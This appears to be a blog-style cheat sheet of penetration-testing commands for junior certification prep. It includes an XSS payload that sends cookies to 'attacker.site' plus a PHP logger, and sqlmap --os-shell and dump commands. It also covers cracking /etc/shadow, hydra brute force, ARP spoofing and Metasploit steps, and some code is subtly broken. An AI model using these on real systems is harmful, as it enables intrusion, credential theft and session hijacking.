There are lots of resources out there that can help you start in penetration testing. One of those resources is the WYWM potential platform among other junior penetration certifications. Recently I was able to certify as a junior penetration tester. I realized that at a junior level, there are not that many commands and tools that a junior penetration tester needs to know. In fact, I was able to summarize all the commands and tools in a form of a cheat sheet. These are the commands I use everyday and having this cheat sheet saves a lot of time. If you know all the commands/tools below, this cheat sheet will prepare you for your first junior penetration certification.
Penetration testing is a lot more than just throwing commands against a machine.
I would highly suggest before attempting to use these commands/tools for real-life engagements to have taken an ethical hacking course prior. Myself nor the company is responsible for the ill usage of these commands/tools, these are presented solely for educational purposes.
Also, before attempting any certification, you should practise all of these commands in some sort of a lab environment and understand how these tools/commands work together.
Anyone who has done any type of penetration testing knows that enumeration is half the battle. Here are some of the techniques you should know.
nmap Scan (Full)
nmap -sC -sV -p- 10.10.10.10
nmap Scan (UDP Partial)
nmap -sU -sV 10.10.10.10
nmap Scan (Partial)
nmap -sC -sV 10.10.10.10
nmap -O 10.10.10.10
fping -a -g 10.10.10.0/24 2>/dev/null nmap -sn 10.10.10.0/24 (to skip port scan phase) netdiscover -r 10.10.10.0/24
The next set of commands should be used when attacking a web application. Actually understanding what these do and not just throwing them against your target, is really important.
nc -v 10.10.10.10 <port#> HEAD / HTTP/1.0 (press the enter key twice)
OpenSSL for HTTPS services
openssl s_client -connect 10.10.10.10:443 HEAD / HTTP/1.0
Cross Site Scripting (XSS)
To send cookie to attacker-controlled site:
<script> var i = new Image(); i.src=”http://attacker.site/log.php?q=”+document.cookie; </script>
Log.php page on attacker’s site:
<?php $filename=”/tmp/log.txt”; $fp=fopen($filename, ‘a’); $cookie=$_GET[‘q’]; $fwrite($fp, $cookie); fclose($fp); ?>
Httprint -P0 -h 10.10.10.10 -s /path/to/signatirefile.txt
GET, POST, HEAD, PUT, DELETE, OPTIONS
Using verb OPTIONS will show you what other verbs available
nc 10.10.10.10 80 OPTIONS / HTTP/1.0
To upload files using HTTP use the PUT verb as follows:
wc -m shell.php
The command above will give the size of the payload, then use the following:
PUT /shell.php Content-type: text/html Content-length: <payload size>
Directory and File Scanning
dirb http://10.10.10.10 dirsearch.py -u http://10.10.10.10 -e * gobuster -u 10.10.10.10 -w /path/to/wordlist.txt dirbuster nikto -h 10.10.10.10
sqlmap -u http://10.10.10.10 -p <parameter> sqlmap -u http://10.10.10.10 --data POSTstring -p <parameter> sqlmap -u http://10.10.10.10 --os-shell sqlmap -u http://10.10.10.10 --dump Order to use in: #to identify database sqlmap -u http://10.10.10.10 -dbs #to identify tables sqlmap -u http://10.10.10.10 -D <name of db> --tables #to dump database sqlmap -u http://10.10.10.10 -D <name of db> -T <name of table> --dump
This portion will cover system attacks, it is very important to understand how to execute brute force attacks and how to run exploits.
unshadow /etc/passwd /etc/shadow > password.txt john password.txt john -show password.txt
john -wordlist /path/to/wordlist -users=users.txt hashfile
Brute Forcing with Hydra
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22 hydra -L users.txt -P pass.txt telnet://10.10.10.10
echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
search <name of exploit> use <name of exploit> info show options, show advanced options SET RHOST 10.10.10.10 SET payload <name of payload> Exploit background sessions -l sessions -i 1
I would practise your routing if you are planning to take any junior penetration tester certification. Here is a command to remember:
ip route add ROUTETO via ROUTEFROM
ip route add 10.10.10.10 via 192.168.0.1